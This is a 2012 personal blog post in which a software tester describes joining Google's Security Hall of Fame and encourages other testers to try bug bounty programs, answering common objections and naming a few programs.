Eusebiu Blindu's Blog » Blog Archive » Google security Hall of Fame

Google security Hall of Fame

05 Oct 2012 @ 6:20 AM

I was recently added to the Google's Security Hall of Fame and I am quite honored and proud of that, even if it’s been a hassle with the updating on the pages.
But besides bragging with it , I really want to see more testers on similar hall of fame pages for more reasons:

Even if security is seen as a separate component sometimes, I would still include it in the testing area.
It's a good way to practice some testing related skills, a very good exercise I would say
It's quite fun. Could be frustrating to find a relevant issue, because there are many hunters out there and once a bug is found it's fixed in Google very fast. But still, it's fun. Especially if you want to balance a boring routine job.
I think if testers appear there more often it's good for us. It's a credibility point. It increases the way testing it's seen a little bit.
You can raise your individual reputation
You can earn some cash. It's not super great, but you can break your personal record for best payed bug.

I see why testers can be reluctant to try it to focus more on this area, at least the bug bounties, if not a full focus. And I have some comments solutions:

Time. Of course time it's the main limitation for people, but you know, for that you have to make choices and decisions. Technically though to find a bug and report it 15 min sometimes is more than enough. Sure for that you need experience and knowledge that require more time, but I don't think testers start from 0 when it comes to security.
Target/Mission. I think testers just assume they need to directly hack a server, run SQL queries on the database, find a real major flaw to get the Google bounty for example. So they are overwhelmed by the possible task. Well, even if that would be awesome to find and of course very important, the bounties don't reward only those issues. It also rewards vulnerabilities that are considered high based on statistics https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project , like XSS or CSRF. Don't be output by the strange fancy names. You actually don't need to know the official labels to submit an interesting bug, but it would definitely help. Think more at the practical part, like: can you send an URL link to someone that belongs to google.com domain and be able to steal private data?
Technical part. I think the technical parts here are not that many, and the biggest requirement is creativity/imagination. You maybe know about the hackers of 13-16 years old that did quite some damage to major platforms. I don't think they are that good technically, but mostly they now how to speculate, multiply and put in action a specific functionality.
Competition. Well for sure there is a lot of competition in that area and if you look at the security hall of fame for major platforms there aren't thousands of people there, but quite a relatively short list. However now there are many public bug bounties and each of those platforms have huge areas where a bug might hide. So I think it's still accessible, and cannot be used as a serious excuse.

Well there might be other things that make testers reluctant, but anyway I recommend it giving a shot anyway.

Note: In security bug bounties you will encounter a few annoying things: bugs not getting approved (every bug bounty program is different), various types of conflicts with other vulnerability researchers, or .. ANNOYING when not being updated to Google Hall of Fame (had to send many emails till they didn’t forgot to add me on the list). However there are many bug bounty programs out there. Example: Paypal has a program and you can try it because a minor bug will be approved (with a minor bounty); Microsoft has a page where they don’t reward you, but they put you on a list.

This is the fun in bug bounty programs, if you don’t like one program (like Google bug bounty) there are others. And more and more companies are starting similar ones.